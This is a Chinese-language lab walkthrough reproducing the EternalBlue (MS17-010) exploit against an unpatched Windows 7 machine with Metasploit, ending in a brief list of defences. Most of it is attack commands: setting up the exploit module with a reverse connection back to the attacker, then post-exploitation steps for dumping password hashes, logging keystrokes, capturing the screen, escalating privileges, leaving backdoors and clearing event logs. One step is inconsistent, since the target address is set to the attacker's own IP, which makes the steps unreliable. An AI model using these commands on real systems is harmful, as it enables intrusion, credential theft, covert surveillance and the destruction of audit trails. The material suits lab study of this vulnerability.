**** 复现永恒之蓝------ms17-010****
一,环境配置:
1. kali系统(攻击机)
2.windows7(目标机)一定要确保没有安装补丁。445端口号要打开。
二,收集信息(确保属于同一网段)
1.ip地址:
攻击机:kali 192.168.43.20
目标机:win7 192.168.43.22
2. 收集方式:
获取目标机地址:192.168.43.22
我在这里用的是win7的虚拟机,查找win7的IP:按下win+R后输入cmd进入终端,输入ipconfig查看IP地址。
获取攻击机地址:192.168.43.20
这里指kali系统的IP,在终端输入ifconfig查看。
检测win7的445端口号是否打开
利用nmap工具检测目标机开启了哪些端口号,我们的CVE漏洞主要利用的是445端口号。
二,配置ms17-010
使用 metasploit 软件利用 ms17-010 漏洞。
打开Metasploit软件,启动命令:
msfconsole
1. 进入meatsploit框架:
msf6 > 表示成功进入
2. 首先查找ms17-010所有的模块
search ms17-010
3.使用exploit模块
命令:
use 0
exploit/windows/smb/ms17-010
查看exploit攻击模块中需要设置哪些参数:
show options
配置目标机ip地址和端口号(必须是445 )
set RHOSTS 192.168.43.20
配置攻击机ip地址和端口号(随意),命令:
set LHOST 192.168.43.20
set LPORT 8893
配置目标机的系统类型。
set target 1
执行攻击:run 或者 exploit
连接成功。
成功后可以输入sysinfo查看目标机的系统信息。
三,漏洞利用:
chcp 65001 ------解决乱码问题
ps ------查看目标机进程
run vnc ------监控目标机桌面
screenshot ------截取目标机屏幕
shell ------进入目标机 cmd 中(添加用户,修改文件,留后门。)
clearev ------清除日志(清理自己的痕迹)
getsystem ------ 提升权限
shell ------ 进入对方的命令终端
hashdump ------ 获取密码hash值
keyscan_start ------打开记录键盘
keyscan_dump ------记录键盘
keyscan_stop ------ 关闭记录键盘
四,漏洞防御
• 安装杀毒软件。
• 为windows打补丁。
• 禁用SMB1协议。
• 使用防火墙设置进/出站规则,阻止445端口号的连接。